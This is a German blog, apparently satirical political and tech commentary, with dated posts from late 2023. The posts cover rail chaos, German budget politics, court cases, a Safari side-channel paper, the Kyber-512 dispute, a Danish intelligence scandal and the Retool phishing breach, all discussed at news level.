Die Klage (von Sony) wird abgewiesen. Sony bleibt auf den Kosten des Rechtsstreits sitzen. Eine Revision wird nicht zugelassen.
Update: Das Urteil war inkompetent geschwärzt. Sie haben es unter einem anderen Link neu hochgeladen.

Sun Dec 3 2023

[l] Ich habe gestern einen Ausflug nach Dresden gemacht. Die Züge zwischen Cottbus und Dresden sind notorisch überfüllt. So überfüllt, dass wenn man die Kapazität verdoppeln würde, immer noch Passagiere stehen müssten.
Kennt jemand jemanden bei der Bahn? Denen müsste mal jemand erklären, dass sie mehr Geld verdienen, wenn sie mehr Wagen anhängen. Die Zugfrequenz könnte man auch mal verdoppeln oder verdreifachen, aber das würde ja mehr Personal benötigen.
Bei der Rückreise mussten wir dann hilflos zwei vollen Zügen am ohne uns Abfahren zugucken und haben dann verzweifelt eine Umgehung über Leipzig probiert. Von Leipzig aus nimmt man dann eine S-Bahn nach Dessau und von dort gibt es einen Zug nach Berlin. Die S-Bahn war so krass überfüllt, dass die Türen nicht schließen wollten, weil sich drinnen auch auf den Stehplätzen die Leute mehrlagig lagerten.
Aus dem Zug zeigte die Bahn-App dann an, dass der Zug nach Berlin schon weg ist. Der Zug war aber nicht weg. In einem revolutionären Akt hat der Zug dort gewartet (letzter Zug in Richtung Berlin an dem Tag) und uns doch noch sicher nach Berlin gebracht. "Abfahrt" in Dresden: halb sieben. Ankunft in Berlin: ein Uhr nachts.
An dieser Stelle daher einen herzlichen Dank an den Zugführer von dem Regionalexpress, der uns nicht in Dessau hat stranden lassen. Und ein herzliches Fuck You an die Streckenplaner bei der Deutschen Bahn.
Update: Hier kommt gerade der sachdienliche Hinweis, dass die Regionalzüge vom jeweiligen Bundesland ausgeschrieben und gemanaged werden, nicht von der Bahn. Selbst wenn sie wollte, könnte die Bahn nicht mehr Wagen anhängen.
Das muss man erstmal schaffen, liebe Bundesländer. Noch schlimmer zu verkacken als die Bahn.
Update: Ein Leser erklärt, dass der Grund für den Zustand des Regionalverkehrs in Sachsen das Projekt „City-Tunnel Leipzig“ ist. Das haben die Stadtplaner so verkackt, dass 500 Mio Mehrkosten anfielen, die seit Investitionen in den Regionalverkehr seit dem aufgefressen haben.

Tue Nov 28 2023

[l] Manchmal lohnt sich ein langer Atem. Nehmt nur die Griechen. Was die sich anhören mussten damals, als Deutschland und die Troika sie kaputtgemacht haben.
Die Lage war ja im Wesentlichen, dass Griechenland vor einem Schuldenberg stand, und keinen Haushalt machen konnten, weil sie keine weiteren Schulden aufnehmen konnten.
Der eine oder andere wird sich schon denken, was jetzt kommt :-)
Griechischer Ex-Minister hat Vorschläge, wie Deutschland mit dem Haushaltsloch umgehen könnte. Und zwar richtig tolle Vorschläge! Vorschläge, die den Älteren unter euch bekannt vorkommen könnten.
Der ehemalige griechische Energie- und Umweltminister Panagiotis Lafazanis rät Deutschland nun zu einem drastischen Schritt - dem Verkauf der eigenen Inseln
(Kontext)
Aber wartet, das ist nicht alles. Er äußert auch Sorgen.
Laut Lafazanis drohe Deutschland gerade, Europa in eine „lang anhaltende Krise zu führen“.
MWAHAHAHAHA
Das muss man ja echt anerkennen. Der hat jetzt 13 Jahre geduldig gewartet. Rache ist ein Gericht, das kalt genossen wird.
Er hat auch einen weiteren guten Vorschlag für uns. Falls unsere Regierung (absehbar) als zu inkompetent herausstellen wird, die Krise zu meistern.
„Sollten die Deutschen das nicht selbst in den Griff bekommen, dann müssen sie sich unter die Aufsicht der Troika begeben. Dann werden sie gezwungen“, so der ehemalige Minister.

Sat Nov 25 2023

[l] Nvidia hat eine Klage am Bein, sie hätten Quellcode geklaut.
Gut, das ist in Silicon Valley nicht ungewöhnlich, passiert sozusagen ständig. Aber in den meisten Fällen stimmt es schlicht nicht. Der Nachweis ist auch notorisch schwierig, zum Beispiel bei den Klagen von SCO gegen IBM.
Und es stellt sich natürlich die Frage, woher der Kläger das überhaupt wissen will. Nun, in diesem Fall war das relativ einfach. Nvidia hat bei einer Präsentation beim späteren Kläger Code gezeigt, den der Kläger wiedererkannt hat. Die haben dann schnell einen Screenshot gemacht, bevor der Vortragende kapierte, was gerade passiert.
Man findet einfach kein gutes Personal mehr. Fachkräftemangel und so.
In diesem Fall kommt noch dazu, dass der Vortragende von Nvidia bei dem Kläger abgeworben wurde, und schon in Deutschland vor Gericht zugegeben hat, dass er Code hat mitgehen lassen.
[l] Ich verteidige die Grünen ja selten und ungern, aber heute ist es mir ein Anliegen, darauf hinzuweisen, dass für das Haushaltsdebakel Scholz und Lindner zuständig sind, nicht Habeck.
Habeck hat seinen Job gemacht und nach Geld für seine Projekte gefragt. Scholz hat den Verfassungsbruch begangen, und Lindner wäre dafür zuständig gewesen, das als Flimflam-Taschenspielertrick zu erkennen und zu verhindern.

Tue Nov 21 2023

[l] Ach. Ach was. Spotify muss keine Play-Store-Gebühren an Google zahlen. Als Einzige.
Die haben einen geheimen Deal mit Google gemacht. Der ist jetzt nicht mehr geheim, weil Epic in ihrem Gerichtsverfahren mal eine ordentliche Discovery-Phase gemacht hat.
Wie kann das sein, dass Spotify nichts zahlen muss aber alle anderen 30%? Oh, sagte ich 30%? Nein, das hat Epic ja auch schon auf 15% runtergekriegt mit ihren Drohungen.
Nun, ganz einfach.
“If we don’t have Spotify working properly across Play services and core services, people will not buy Android phones,” Harrison testified.
Harrison ist ein Google-Zuständiger, den Epic als Zeugen geladen hat.
[l] Ja wo finden wir denn jetzt 60 Milliarden Euro? Liegt doch nicht auf der Straße rum!
Wie sich rausstellt: Doch, tut es. In Form unweltschädlicher Subventionen. Das Umweltbundesamt hat 2018 mal eine Liste gemacht. Gesamtbetrag: 65 Milliarden Euro.
Wenn wir die Subventionen alle absagen, dann haben wir den Klimawandel sogar doppelt bekämpft!1!!
Update: Alternative könnte Lindner auch die Steuern eintreiben, die aktuell hinterzogen werden. Da käme genug zusammen, um auch die anderen Sondervermögen zu finanzieren.
[l] Können wir mal bitte kurz festhalten, dass dieses Urteil aus Karlsruhe kein Problem der Ampel ist, sondern eines aller Parteien? Wenn die CDU die nächste Regierung stellt, wird das selbstverständlich genauso wenig gehen wie es jetzt bei der Ampel geht.
Die ganze Schuldenbremse war eine PR-Luftnummer. Die haben sie gemacht, weil sie sich sicher waren, dass sie da problemlos drum herum tricksen können. Das kann nach dem Urteil die CDU natürlich genau so wenig wie die Ampel gerade.
Daher sieht man auch keine feiernden CDU-Leute. Die wissen genau, dass sie mit Schwung auf den gemeinsamen Teppich gekackt haben. Und sie wissen natürlich auch, dass ihr Gehabe von wegen kleiner Staat und "die SPD kann nicht mit Geld umgehen" glatte Lügen sind.
Ein Gutes hat das Urteil aber. Die AfD wird nach der Machtergreifung genau so paralysiert sein.

Sun Nov 19 2023

[l] Amazon: Alexa-Weiterentwicklung mit KI kostet Hunderte Jobs.
Wenn ich das richtig verstehe, wird die Weiterentwicklung von "KI" gemacht.

Wed Nov 15 2023

[l] Und jetzt zu den Wirtschaftsnachrichten: RWE mehr als verdoppelt den Gewinn.
Das hat bestimmt nichts, aber auch gar nichts mit den hohen Gaspreisen zu tun. Mal gucken, wie die Tagesschau das wegzuformulieren versucht:
Der Energiekonzern RWE hat vor allem mit der Stromerzeugung aus Erneuerbaren Energien und dem LNG-Handel gute Geschäfte gemacht.
Hmm, ob das reicht? Einfach zuerst die Erneuerbaren erwähnen und dann LNG statt Erdgas sagen? Reicht das, damit das sedierte Publikum die Verbindung nicht mitkriegt?

Tue Nov 14 2023

[l] Google verklagt zwei Vietnamesen wegen falscher DMCA-Anzeigen. Es handelt sich um T-Shirt-Verkäufer, die einfach einen Haufen Accounts aufgemacht haben, und von denen aus dann massenhaft Kanäle weg-DMCA-t haben, die ebenfalls T-Shirt verkauft haben.
Und zwar echt massenhaft:
Over the past few years, Nguyen, Pham and those working with them, are said to have created at least 65 Google accounts to send confirmed bogus notices targeting 117,000 URLs, plus another 500,000 URLs via notices that Google suspects are fraudulent too.
Das ist doch mal eine Arbeitsmoral, da können wir faulen Industrienationen nur von träumen!

Wed Nov 8 2023

[l] Die neuesten Opfer der Digitalisierung sind die Abi-Jahrgänge an zwei Gymnasien in Koblenz.
Die haben Schülern und Lehrern Tablets und Laptops gegeben, und darauf war dann eine App, in der sie im Unterricht Notizen gemacht haben.
Dann gab es ein Netzwerkproblem beim Betreiber des Schulnetzes, und jetzt sind alle diese Aufzeichnungen weg.
Und ausgerechnet die sei durch eine Netzwerk-Panne auf den Geräten gelöscht worden. Und damit eben auch alle Mitschriften. Die DASDING-Kollegen haben mit Schülersprecher Rayan Marotta gesprochen. Er erzählt, dass wirklich alles weg ist – außer ein paar Fotos und Screenshots – und dass die Stimmung bei den Schülerinnen und Schülern sehr, sehr schlecht sei.
Nun löscht eine Netzwerkpanne normalerweise keine Apps und keine Daten in Apps. Da hat es also noch zusätzliches Versagen gegeben, für das hoffe ich Köpfe rollen werden. Aber wartet mal, geht noch weiter. Das war nicht nur reguläres Versagen, das war Versagen im Industriemaßstab:
Sicherheitskopien gäbe es leider auch kaum, so Rayan Marotta, weil aus Datenschutz- und Sicherheitsgründen keine Clouds aus dem Ausland genutzt werden dürfen.
Dieser Satz ist fraktal falsch. So falsch, dass auch das Gegenteil falsch ist.
Selbstredend kann man Backups ohne die Cloud machen, Datenschutz behindert Backups nicht, und man kann auch Backups in fremde Clouds machen, solange man die Daten verschlüsselt.
Dass die jetzt auch noch die Victim Blaming versuchen, finde ich absolut erbärmlich. Pass uff, Atze, als nächste Ausrede kommt "aber wir hatten doch so wenig Geld und kein Personal". NA DANN MACH DAS HALT NICHT, DU FLACHZANGE!

Mon Nov 6 2023

[l] Und jetzt die Wirtschaftsnachrichten.
Die Opiumproduktion in Afghanistan ist massiv eingebrochen, nachdem die Taliban den Anbau verboten hat.
Höchste Zeit, dass die Nato zurückkommt und Demokratie aus Flugzeugen abwirft. Das war ja auch letztes Mal der Auslöser für den Krieg. Supply-Chain-Schock wegen Opiumanbauverbot der Taliban.
Das sind wirklich fiese Terroristen diese Taliban. Können die sich nicht darauf beschränken, kleinen Mädchen eine Burka aufzuzwängen und ihnen die Schulbildung zu verweigern? Damit könnte der Westen prima leben. Da machen dann ein paar Hippies eine Facebookgruppe und ein paar Songs zu und dann sind alle zufrieden, weil jemand was gemacht hat.
Aber Opium teuer? Das gefährdet die ganze Machtausübungskette der westlichen Demokratien!
Wobei sich die Amerikaner ja da auch ähnlich Fracking-Gas unabhängig gemacht haben über ihre synthetischen Opiate. Vielleicht gibt es doch keinen Nato-Einsatz jetzt.

Fri Nov 3 2023

[l] Ich hab mich ja hier häufiger über die Amigo-Partei und ihre "brutalstmögliche Aufklärung" lustig gemacht, über ihre schwarzen Kassen und jüdischen Vermächtnisse.
Aber die Clankriminalitätspartei ist natürlich nicht besser. Aktuell:
Eklat im Hamburger Untersuchungsausschuss zur Cum-Ex-Affäre von Kanzler Olaf Scholz: Ausgerechnet der von der SPD berufene Chefermittler versteckt nach stern-Informationen zwei Laptops mit heiklen E-Mails.
Ich verstehe ja nicht, wieso die alle an Cum-Ex-Olaf festhalten. Spätestens seit der Habeck-Rede ist doch klar, wer hier tatsächlich der Kanzler ist in dieser Regierung.
Ja aber warte mal, das fällt doch auf, wenn die Beweise plötzlich weg sind? Und der Zugang zu so einem Asservaten-Tresor ist stark beschränkt und wird protokolliert. Das muss denen doch klar gewesen sein, dass ihr Handeln auffliegt?
Er habe "verfügt, dass die Akteneinsicht sowie des Arbeitsstabes mit den Asservaten zunächst ausgesetzt wird", teilt Chefaufklärer Steffen Jänicke den Obleuten im Ausschuss mit.
Hahahaha, geil! Das merken die NIE!!1!
War ja vorher schon klar, dass Cum-Ex-Olaf nicht zur Verantwortung gezogen wird. Aber jetzt ist klar, dass dieser Jänicke auch nicht zur Verantwortung gezogen wird.
Der Clan ist halt größer als es auf den ersten Blick aussieht bei der Clankriminalitätspartei.
Update: Ihr AHNT ja nicht, vor wem der Verfassungsschutz im Februar gewarnt hat!1!!
[l] Sam Bankman-Fried in allen Anklagepunkten schuldig gesprochen.
Oh gut. Dann haben wir ja einen Sündenbock. Gehen Sie weiter. Gibt nichts zu sehen hier.
Dann müssen wir auch nicht mehr klären, welches Regierungsversagen das möglich gemacht hat. Und wer alles Parteispenden von dem kassiert hat auf dem Weg.

Sun Oct 29 2023

[l] "So, wie es jetzt ist, kann es nicht bleiben".
Finanzminister Lindner will die Leistungen für Asylbewerber verringern. Diese würden wie ein "Magnet" wirken, sagte er im Bericht aus Berlin. Bei den Kürzungen nahm er auch die Länder in die Pflicht.
Sehe ich genau so. Wenn man Asylbewerber durch Abgeordnete ersetzt.
Wenn wir wirklich Fortschritte gegen Clankriminalität und Korruption erreichen wollen, sollten wir mit den staatlichen Leistungen für Abgeordnete anfangen.
Im Interview im Bericht aus Berlin sagte der FDP-Chef, er und sein Parteikollege, Justizminister Marco Buschmann, hätten den Vorschlag gemacht, da es offensichtlich sei, dass der "Sozialstaat mit seinen im europäischen Vergleich sehr hohen Leistungen wie ein Magnet wirkt." Das müsse abgeschaltet werden.
Ja aber echt mal. Was da an Leistungen an inkompetente, unfähige, bösartige Ideologen gezahlt wird, nur weil die im Parlament herumhängen statt offen und ehrlich arbeitslos gemeldet zu sein. Geht echt gar nicht.

Thu Oct 26 2023

[l] Gerade macht ein Angriff auf Safari die Runde. Ich hab das nur überflogen, aber für mich liest sich das jetzt nicht sonderlich spektakulär. Sie haben gezeigt, dass der Angriff, den wir jetzt seit Jahren diskutieren, auch gegen Safari auf Apple Silicon funktioniert.
Meine Überraschung hält sich in Grenzen.
Ich fasse mal die wesentlichen Punkte zusammen:
we can defeat Apple’s low-resolution timer, compressed 35-bit addressing, and value poisoning countermeasures, allowing us to read any 64-bit address within the address space of Safari’s rendering process
Apple hat, wie vor ihnen Microsoft und andere, auf irgendwelche mehr oder weniger nutzlosen Mitigations gesetzt, ohne ihre tatsächlichen Probleme zu lösen. Seit Jahren meine Rede, dass das nicht gut ist.
Combining this with a new technique for con- solidating websites from different domains into the same renderer process
Das erzähle ich in meinen Vorträgen seit Jahren, dass man einen Prozess pro Request braucht, damit die sich nicht gegenseitig die Daten extrahieren können.
Finally, we note that Safari / WebKit is the only browser engine permitted on iOS devices re- gardless of web browser app.
Dass DAS eine bekloppte Idee ist, war schon klar, bevor Apple es angekündigt hat. Apple-Kunden war das immer egal, ob Apple Dinge tut, die zu ihren Ungunsten sind. You are holding it wrong.
Was an dem Angriff jetzt besonders ist, ist dass das halt mal jemand alles gemacht hat. Dass das prinzipiell geht, und dass Apple nichts tun wird, bis jemand die Arbeit investiert, um das zu zeigen, war auch offensichtlich.
Was ich an der Sache am gruseligsten finde:
This research was supported by the Air Force Office of Scientific Research (AFOSR) under award number FA9550-20-1-0425; an ARC Discovery Project number DP210102670; the Defense Advanced Research Projects Agency (DARPA) under contract HR00112390029 and W912CG-23-C-0022; the Deutsche Forschungsgemeinschaft (DFG, German Research Foundation) under Germany's Excellence Strategy - EXC 2092 CASA - 390781972; the National Science Foundation under grant CNS-1954712; and gifts by Cisco and Qualcomm.
Wer fehlt auf der Liste? Richtig! Apple!
Apple-User lügen sich immer selbst einen in die Tasche, dass Apple schon irgendwie der einzige Tech-Konzern ist, der edel und rein ist und für seine Kunden nur das Beste will.
Kurz: Aus meiner Sicht ist das die Aufregung gerade nicht wert. Ist alles genau so, wie es schon lange klar war. Apple verkauft Mist und weiß es, sitzt auf unfassbaren Bargeldbergen und weiß nicht wohin damit, aber überlässt die Finanzierung derartiger Forschung dem Steuerzahler, Konkurrenten und dem Militär. Ja geil. Da willste doch deine Geräte kaufen!!

Mon Oct 23 2023

[l] Völlig überraschend gründet die Wagenknecht jetzt ihre eigene Partei.
Besonders überrascht ist die Linkspartei, die jetzt ihren Fraktionsstatus verliert. Also DAS konnte ja wohl NIEMAND vorhersehen!1!!
Die haben gedacht, die Wagenknecht lässt sich noch ein paar weitere Jahrzehnte von ihnen dissen und in Talkshows vorführen.
Ja weiß denn die Wagenknecht nicht, was sie da gerade für einen Schaden anrichtet an der Linkspartei? Doch, klar! Deshalb hat die zehn Jahre lang nebulöse Ankündigungen gemacht und gründet die Partei erst jetzt.
Die Linkspartei hat NICHTS gemacht. An keiner Stelle haben die auch nur simuliert, als würden sie sich ihre Argumente ruhig anhören und wären dann kompromissfähig.
Kannst du schon so machen, aber irgendwann spielt dann halt keiner mehr mit dir.
Ich finde es schade, denn keine andere Partei hat mit ihrem Programm ernsthaft versucht, die Bedürfnisse der Mehrheit der Bevölkerung abzudecken. Aber Mitleid habe ich jetzt keines mit denen. Das haben sie sich selbst eingebrockt.
Ich wünsche viel Spaß in der außerparlamentarischen Opposition. Da könnt ihr dann ja Brandbriefe in der Jungen Welt schreiben, wie schlecht behandelt ihr euch fühlt.
Ist schon krass, wie so eine Partei komplett in der Belanglosigkeit verschwinden kann.
Immerhin eine gute Sache kann man über die Linkspartei sagen. Populisten sind sie nicht. Die gehen lieber unter, als dass sie sich anhören und dann im Wahlkampf versprechen, was die Leute haben wollen.
Update: Nee, nicht in der Jungen Welt. Im Neuen Deutschland. In der Jungen Welt schreiben eher die Wagenknecht-Anhänger.

Mon Oct 16 2023

[l] Seit Wochen ist jetzt der Congress in den USA nicht handlungsfähig.
All die Jahre haben die sich alle Sorgen vor dem Shutdown gemacht, und vor Regierungs-Paralyse. Jetzt ist das Parlament tatsächlich paralysiert.
Und merkt man davon was? Eher nicht, oder?
Ich sage ja immer: Das belgische Modell funktioniert! Wir sollten auch mal ein paar Jahre keine Regierung haben. Den Problemen eine Chance geben, sich selbst zu beheben, ohne dass da eine FDP reingrätscht und aktiv alles schlimmer macht.

Sat Oct 14 2023

[l] Als eines von wenigen westlichen Medien hat die BBC bislang darauf geachtet, die Hamas nicht als Terroristen zu bezeichnen im aktuellen Konflikt, obwohl die britische Regierung eine klare Linie fährt und Hamas als Terrororganisation klassifiziert hat.
Hier ein Artikel dazu im ehemaligen Nachrichtenmagazin. Natürlich gibt es dazu von den üblichen Propagandisten heftig Kritik.
Aber jetzt geschah etwas Unerwartetes (für mich jedenfalls): Das BBC-Hauptquartier wurde von wütenden Palästinensern mit roter Farbe beschmiert. Begründung:
spreading the occupation's lies and manufacturing consent for israel's war crimes means that you have Palestinian blood on your hands
Mit anderen Worten: Die depperten Palästinenser beschmieren die einzige Nachrichtenquelle, die sie noch nicht als Terroristen beschimpft.
Nicht sonderlich smart, diese Palästinenser.
Ich finde das übrigens auch nicht smart, Leute als Terroristen zu bezeichnen. Aus taktischen Gründen.
Wenn sie Terroranschläge gemacht haben, sind die zwar inhaltlich Terroristen, aber wenn man sie so bezeichnet, macht man aus dem bis dahin möglicherweise nur vorübergehenden Zustand ein Teil ihrer Identität. Eine Identität ist viel langfristiger, in diesem Fall sogar permanent.
Wenn man also will, dass Terroristen sich reformieren, und möglicherweise ihre ehemaligen Kollegen an die Justiz verpfeifen, dann ist es nicht schlau, sie als Terroristen zu bezeichnen. Selbst wenn sie welche sein mögen.
Im Übrigen sei noch der Hinweis erlaubt, dass im Krieg immer beide Seiten aus der Perspektive der anderen Seite Terroristen sind. Man kämpft ja im Krieg nicht mit offenem Visier, sondern man greift nachts oder anderweitig überraschend und/oder verdeckt mit Drohnen oder Raketen oder Artillerie an. Israel warnt vor Großangriffen wenigstens vorher, dass die Zivilisten im Zielgebiet evakuieren sollen, aber das ist ja nicht unbedingt eine Option, insbesondere wenn die Frist knapp kalkuliert ist. Und selbst wenn du die Warnung rechtzeitig siehst und evakuierst, sind dein Haus, die Schule deiner Kinder und dein Arbeitsplatz trotzdem weg. Als Betroffener hätte ich da auch Mühe, den Unterschied zu Terrorismus herauszuarbeiten.
Insofern sind Beschimpfungen von Kriegsparteien als Terroristen grundsätzlich nicht hilfreich und ein Mittel der Propaganda. Das ist ein Krieg da. Krieg ist schlimmer als Terrorismus.
Ohne da jetzt inhaltlich zu werten oder mich auf eine Seite zu schlagen: Ich finde es gut, was die BBC da macht.
[l] Aus der beliebten Reihe "Journalismus ist Glückssache", heute: Der Deutschlandfunk über den Gazastreifen. Sie haben ein Foto eines von israelischen Luftangriffen zerstörten Gebietes im Gazastreifen, und ihre Bildunterschrift ist:
Blick auf ein von palästinensischen Raketenangriffen zerstörtes israelisches Gebiet im Gazastreifen (AFP / BELAL AL SABBAGH)
Zum Vergleich: dasselbe Foto bei CNN hat die Bildunterschrift
This aerial photo shows heavily damaged buildings following Israeli airstrikes in Gaza City on October 10, 2023. Belal Al Sabbagh/AFP/Getty Images
Update: Ein Leser hat eine Google-Image-Suche nach dem Bild gemacht, und fand noch diesen Artikel beim Deutschlandfunk, wo das angeblich die israelische Stadt Aschkelon ist. Diese österreichische Seite lokalisiert das Motiv "in Israel". Bei CBNC ist es wieder Gaza City. Findet jemand noch eine Nachrichtenquelle, die das in die Ukraine gelegt hat? :-)
Update: Oh, ach! Der Deutschlandfunk hat im Originalbericht ihre Bildunterschrift geändert, da steht jetzt:
Blick auf ein von israelischen Raketenangriffen zerstörtes Gebiet im Gazastreifen (AFP / BELAL AL SABBAGH)
(Danke, Fabian)

Sun Oct 8 2023

[l] Tja. Das war es dann wohl mit dem internationalen Goodwill für Palästinenser.
Denen wird so schnell niemand mehr helfen, wenn es darum geht, Brunnen zu bohren oder Schulen zu bauen oder Wasser zu entsalzen.
Und wenn es mal wieder heißt, man könne doch verhandeln, werden jetzt nur noch alle heiser lachen und abwinken. Haben die meisten ja eh schon gemacht. Jetzt tun es dann wohl auch alle anderen.
Bleibt die Frage, was sich die Hamas dabei gedacht hat. Wenn Israel jetzt den Gazastreifen niederbrennt, wäre niemand überrascht. Ich glaube sogar, die meisten werden sich denken: Gut so. Die haben sich das selber zugefügt.
Größeren Schaden hätte man den Palästinensern und ihrer Sache gar nicht zufügen können. Bislang wurden Palästinenser und Palästinenser-Demos in Deutschland geduldet. Das ist dann ja wohl auch vorbei jetzt, oder was meint ihr?

Thu Oct 5 2023

[l] Geldwäsche leicht gemacht: Immobilien bei Zwangsversteigerungen kaufen. Dann geht das durchs Amtsgericht statt durch einen Notar. Der Notar müsste Geldwäscheverdachtsmeldung erstatten. Das Amtsgericht nicht.

Tue Oct 3 2023

[l] NIST hat sich bei der Stärke von Kyber-512 verrechnet.
Kyber-512 ist ein Post-Quantum-Verfahren. Das Feld der Post-Quantum-Verfahren wurde von Dan Bernstein ins Leben gerufen und ist jetzt international hart umkämpft, weil praktisch alle Kryptographen damit rechnen, dass demnächst unsere gesamte Public Key-Krypto unsicher wird, weil jemand einen funktionierenden Quantencomputer ausreichender Größe baut.
NIST ist die US-Standardisierungsbehörde, sowas wie bei uns das DIN. NIST hat sich auch viel in Krypto-Standardisierung eingebracht und hat so Dinge wie AES und SHA3 zu verantworten, jeweils Ergebnis eines internationalen Wettbewerbs.
Im Moment läuft der Wettbewerb für Post-Quantum-Verfahren, und ist bisher vor allem dadurch aufgefallen, dass überraschend viele Verfahren durchgefallen sind, weil sie sich als viel unsicherer als erhofft herausgestellt haben. Im Moment ist das ein ziemlicher Wilder Westen da.
Kyber ist eines der Verfahren im Rennen. NIST hat schon angesagt, dass ihnen die Performance der Verfahren wichtig ist, in Laufzeit, Speicherbedarf und Schlüsselgröße. Kyber gilt als einer der Favoriten.
In 2022, NIST announced plans to standardize a particular cryptosystem, Kyber-512. As justification, NIST issued claims regarding the security level of Kyber-512. In 2023, NIST issued a draft standard for Kyber-512.
NIST's underlying calculation of the security level was a severe and indefensible miscalculation. NIST's primary error is exposed in this blog post, and boils down to nonsensically multiplying two costs that should have been added.
Der Fehler war sowas wie: 2⁴⁰ + 2⁴⁰ = 2⁸⁰. Stimmt halt nicht. Ist 2⁴¹. Bernstein fand, dass eine Behörde dieses Standings so einen Fehler nicht machen würde, und hat mal Akteneinblick beantragt. Dabei kam heraus, dass der Einfluss der NSA deutlich größer war als öffentlich sichtbar war.
Das ist sehr bedenklich, denn die NSA sind ja genau der Grund, wieso wir überhaupt an Post-Quantum-Krypto arbeiten. Die sind die, von der alle annehmen, dass sie als erste einen Quantencomputer haben werden. Wenn also jemand keinerlei Einfluss haben sollte auf die NIST-Standardisierung der Post-Quantum-Verfahren, dann die NSA.
Aber die NSA hat halt eine Doppelaufgabe. Die ist auch für die Verteidigung von Regierungs-IT verantwortlich und hat daher so Dinge gemacht wie Microsoft zu Trusted Computing zu nötigen, weil dem Militär ständig Laptops verloren gingen, und die NSA fand, ohne Trusted Computing und Hardware-Attestation ist Plattenkrypto wertlos (womit sie nicht völlig Unrecht hat).
Tja und jetzt sieht das halt aus, als ob die NSA das NIST-Post-Quantum-Krypto-Verfahren sabotiert, damit die Welt knackbare Verfahren einsätzt und die NSA besser spionieren kann.
[l] In Dänemark gibt es gerade einen Geheimdienstskandal. Ja, ich weiß, der dänische Geheimdienst, da schreiben sich die Witze praktisch von selbst.
Es fing mit Snowden an. Der hat die US-Seite eines Deals mit den Dänen geleakt, der der NSA ermöglichte, Glasfaserkabel in Dänemark komplett abzuhören. Nicht "nur" Transit, auch Kommunikation von Dänen haben sie abgehört.
Auf dänischer Seite war das der Auslandsgeheimdienst. Der hätte das natürlich nicht machen dürfen, weil Dänen betroffen waren, aber das ist nicht der Skandal gerade.
Es gab einen jungen Geheimdienstler, der intern Protest einlegte gegen das Programm. Natürlich wurde das auf dem bürokratischen Weg nicht verfolgt und schnell eingestampft, aber der Typ fing dann an, verdeckte Audiomitschnitte von Meetings mit seinen Kollegen anzufertigen, wie sie über das Programm sprachen. Über 100 Stunden Audio. Diese Mitschnitte gelangten dann irgendwie in die Hände des dänischen Geheimdienst-Kontrollgremiums.
Die haben eine unabhängige Untersuchung angestoßen, die zum Ergebnis kam, dass das alles natürlich illegal und hoch verwerflich war, was der Geheimdienst da gemacht hat. Also hat die Regierung ein Gegen-Gremium einberufen, mit von der Regierung ernannten (also nicht unabhängigen) Mitgliedern, die die unabhängige Untersuchung überstimmten und in der Rundablage abhefteten.
Soweit die Vorgeschichte. Dann haben sie am Flughafen den suspendierten Geheimdienstchef verhaftet und eingelocht. Gegen ihn und seinen damaligen Minister-Chef haben sie Anklage erhoben, wegen Geheimdienstverrats.
Welches Geheimnis sollen sie denn verraten haben? Na die Existenz des Programms! Der suspendierte Geheimdienstchef hat darüber mit seiner 84-jährigen Mutter geredet, und seiner Partnerin, und einem alten Freund. Und ein paar Journalisten, die ihm helfen sollten, negative Berichterstattung anderer Journalisten über seinen Geheimdienst zu kontern.
Woher wissen die das? Nun, jetzt kommen wir zum Herz des Skandals. Sein Geheimdienst hat seine Wohnung und sein Auto komplett verwanzt, und sein Feriendomizil. Die Bänder davon sind jetzt die Beweise der Anklage gegen ihn.
Und was ist mit dem Minister? Noch besser! Der hat im Fernsehen das Programm erwähnt. 2021. Das seit 2014 öffentlich bekannt war, dank Snowden.
In December 2021, a week after the Frederiksen, the former minister, mentioned the NSA cable-tapping deal on television, police officers turned up at his home. Standing outside the thatched fisherman’s cottage, the officers informed the 76-year-old he’d been charged with treason.
Ja, äh, aber das ist doch dann kein Geheimnis mehr, wenn es bereits öffentlich diskutiert wurde? Nun, doch, findet die aktuelle Regierung.
“The present government is of the opinion that a secret is a secret,” Frederiksen says. “It might have been described in the newspapers, but they still say it’s a secret.” In court, the trial is expected to turn on whether an open secret can still be a state secret.
Was für Sprallos. Keiner von denen denkt an irgendeiner Stelle darüber nach, wie das wohl wäre, wenn ihre Nachfolger ihre Präzedenzfälle und ihren Überwachungsapparat mal gegen sie einsetzen würden.
Es hätte niemanden verdienteren treffen können, wenn ihr mich fragt.

Thu Sep 28 2023

[l] Tesla behandelt die Mitarbeiter noch schlechter als andere US-Konzerne, selbst als Amazon. Das neue Tesla-Werk bei Berlin hat eine auffällig Häufung von Arbeitsunfällen. Na gut, denkt ihr euch jetzt, ein paar Unfälle können schon mal passieren. Immerhin baut der Elon da Dinge auf, die vorher noch nie jemand gemacht hat!1!!
Ja, schon, aber wir reden hier nicht von einem halben Dutzend oder so.
Allein zwischen Juni und November 2022 soll Tesla den Recherchen zufolge selbst mindestens 190 meldepflichtige Unfälle angegeben haben.
Unfälle sind meldepflichtig, wenn jemand mehr als drei Tage arbeitsunfähig wird. Wir reden hier also nicht von "ein bisschen an der Kaffeemaschine verbrüht".

Sat Sep 16 2023

[l] Verlässt sich hier jemand auf Multifaktor-Auth mit dem Google Authenticator? Der Artikel beschreibt einen Angriff auf eine Firma, der von jemandem durchgeführt wurde, dem das Gelingen wichtig war.
Der Angreifer hat vorher ordentlich Aufklärung betrieben, kannte den Raumplan des Firmensitzes, hat dann Spearphishing probiert, kam bei einem durch. Den haben sie dann angerufen und mit Deepfake-Stimme eines Kollegen noch ein MFA-Token haben wollen. Das war genug, um den ganzen Laden zu knacken.
The additional OTP token shared over the call was critical, because it allowed the attacker to add their own personal device to the employee’s Okta account, which allowed them to produce their own Okta MFA from that point forward. This enabled them to have an active GSuite session on that device.
Ja, äh, und? Denkt ihr euch jetzt? Nun, stellt sich raus, dass Google sich ein schönes Backup all eurer MFA-Seeds in ihrer Cloud gemacht hat. Mit dem Google-Zugriff konnten die Angreifer sich die Seeds kopieren und dann ist Ende Gelände. Dazu kommt, dass Google die UI schön irreführend gestaltet hat, so dass praktisch niemand dieses Backup deaktiviert hat in der Praxis.
Ganz großes Kino. An sich schon eine krasse Nummer, aber ich bin hier geradezu betäubt gerade von diesem Absatz:
As an aside, we’re glad that not a single on-premise Retool customer was affected. Retool on-prem operates in a “zero trust” environment, and doesn’t trust Retool cloud. It is fully self contained, and loads nothing from the cloud environment. This meant that although an attacker had access to Retool cloud, there was nothing they could do to affect on-premise customers. It’s worth noting that the vast majority of our crypto and larger customers in particular use Retool on-premise.
Was sind wir froh, dass unsere Kunden unserer Cloud nicht trauen! Das hat ihnen den Arsch gerettet!
